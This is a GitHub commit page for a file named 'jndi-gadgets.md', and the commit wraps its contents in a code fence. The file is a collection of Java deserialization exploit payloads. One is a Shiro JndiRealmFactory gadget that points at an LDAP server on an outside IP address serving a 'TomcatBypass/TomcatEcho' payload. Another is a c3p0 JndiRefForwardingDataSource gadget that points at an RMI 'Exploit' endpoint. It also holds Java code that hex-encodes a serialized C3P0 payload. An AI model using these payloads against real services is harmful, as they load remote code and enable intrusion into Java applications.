Skip to content

Commit 7b7ad4f

Browse files
authored
Update jndi-gadgets.md
1 parent 4f7fb78 commit 7b7ad4f

1 file changed

Lines changed: 2 additions & 2 deletions

File tree

jndi-gadgets.md

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,6 @@
1+
```
12
{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory","jndiNames":["ldap://1.116.136.120:1600/TomcatBypass/TomcatEcho"],"Realms":[""],"a":"a"}
23
3-
4-
54
{"object":["com.mchange.v2.c3p0.JndiRefForwardingDataSource",{"jndiName":"rmi://localhost:8088/Exploit", "loginTimeout":0}]}
65
76
InputStream in = new FileInputStream("C3P0.ser");
@@ -31,3 +30,4 @@ public static String bytesToHexString(byte[] bArray, int length) {
3130
}
3231
return sb.toString();
3332
}
33+
```

0 commit comments

Comments
 (0)